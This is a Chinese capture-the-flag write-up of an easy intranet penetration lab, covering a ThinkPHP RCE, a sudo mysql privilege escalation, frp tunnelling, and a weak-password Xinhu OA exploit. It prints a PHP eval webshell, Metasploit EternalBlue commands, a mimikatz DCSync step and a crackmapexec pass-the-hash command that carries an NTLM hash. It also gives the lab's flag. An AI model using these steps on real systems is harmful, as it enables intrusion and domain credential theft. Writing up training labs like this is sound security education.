春秋云镜Initial-WriteUP
春秋云镜Initial-WriteUP
Moonbeaut春秋云镜 Initial
一、靶标介绍
Initial
是一套难度为简单的靶场环境,完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag
,各部分位于不同的机器上。
二、渗透阶段
一、flag01
用fscan
扫描一下,发现80
端口是开放的且存在一个rce
漏洞
fscan.exe -h ip |
使用ThinkPHPGUI
工具传马上去
使用蚁剑连接上去,接下来是提权
先看看sudo -l
有没有什么可以用的,发现一个mysql
可以提权,使用mysql
提权
sudo -l |
成功拿到第一段flag
flag01: flag{60b53231- |
二、flag02
传一个fscan
上去扫一下内网
先看一下ip
ifconfig |
接着用刚才传上去的fscan
扫描一下
chmod +x ./fscan |
从中可以知道我们的目标:
172.22.1.2:DC域控 |
我们的最终目标即为 DC
域控
我们首先对 OA
办公系统进行攻击,在这之前我们要先进行内网穿透
内网穿透
同样的在蚁剑上将frpc
和frpc.ini
传上去
接着我们先在VPS
上开启frps
服务
./frps -c frps.ini |
然后给frpc
运行权限
chmod 777 ./frpc |
查看VPS
上
成功连接上后我们使用proxifier
配置全局代理
配置完代理就可以通过本地连接上172.22.1.21
浏览器查看
这里是弱密码,admin/admin123
信呼 OA 有一个 0day
,弱口令 admin/admin123 登录后台可以直接打 exp
exp:
import requests |
相同目录下还要有个一句话木马
<?=eval($_POST[hacker]);?> |
成功运行后可以看到文件上传的路径,接着用蚁剑连接上去
连接成功后在 Administrator
用户的目录下找到 flag02
flag02: 2ce3-4813-87d4- |
三、flag03
接下来就是对 ip 172.22.1.21
进行渗透,这里需要用到渗透框架 Metasploit Framework
,kali
自带这个框架,这里的攻击机我选用 kali
(windows也可以安装Metasploit Framework,不过上面我说过也要讲讲如何在kali设置代理)。我们首先要在 kali
中设置 socks5
代理,否则我们无法访问其内网的环境。
在 kali
中设置代理比 windows
简单很多,他自带了一个 proxychains4
工具,我们只需要编辑 etc
目录下的 proxychians.conf
文件:
vim /etc/proxychain.conf |
只需要在配置文件的最后加上
socks5 vps port |
在上面用 fscan
的扫描中我们发现该机子存在 MS17-010
漏洞,这个就是大名鼎鼎的永恒之蓝漏洞
我们先在 kali
输入 proxychain4 msfconsole
使用proxychain
启动 Metasploit Framework
(后面简称 msf
)
proxychains4 msfconsole |
输入 search ms17-010
搜索 ms17-010
相关模块,可以看到一共找到了 4
个不同的模块,我们选择使用第一个模块,因为他影响是版本比较多
use exploit/windows/smb/ms17_010_eternalblue |
运行成功会出现
meterpreter> |
该 Meterpreter
是 metasploit
的一个扩展模块,可以调用 metasploit
的一些功能,对目标系统进行更深入的渗透,入获取屏幕、上传/下载文件、创建持久后门等
接着我们已经成功的打进该主机,遗憾的是该机子上并没有 flag
,也就是说我们最后的flag
在 windows DC
域控制器上面
接下来是进行 DCSync
攻击,这里简单解释一下:
首先,什么是 DCSync
在域中,不同的域控之间,默认每隔15min就会进行一次域数据同步。当一个额外的域控想从其他域控同步数据时,额外域控会像其他域控发起请求,请求同步数据。如果需要同步的数据比较多,则会重复上述过程。DCSync就是利用这个原理,通过目录复制服务(Directory Replication Service,DRS)的GetNCChanges接口像域控发起数据同步请求,以获得指定域控上的活动目录数据。目录复制服务也是一种用于在活动目录中复制和管理数据的RPC协议。该协议由两个RPC接口组成。分别是drsuapi和dsaop。 |
也就是说我们可以通过 DCSync
来导出所有用户的 hash
然后进行哈希传递攻击,要想使用 DCSync
必须获得以下任一用户的权限:
Administrators 组内的用户
Domain Admins 组内的用户
Enterprise Admins 组内的用户域控制器的计算机帐户
load kiwi # 调用mimikatz模块 |
接下来我们使用 crackmapexec
来进行哈希传递攻击,来实现 DC域控
上的任意命令执行,通过以下命令来获取 flag03
proxychains4 crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt" |
flag03: e8f88d0d43d6} |
Flag
flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6} |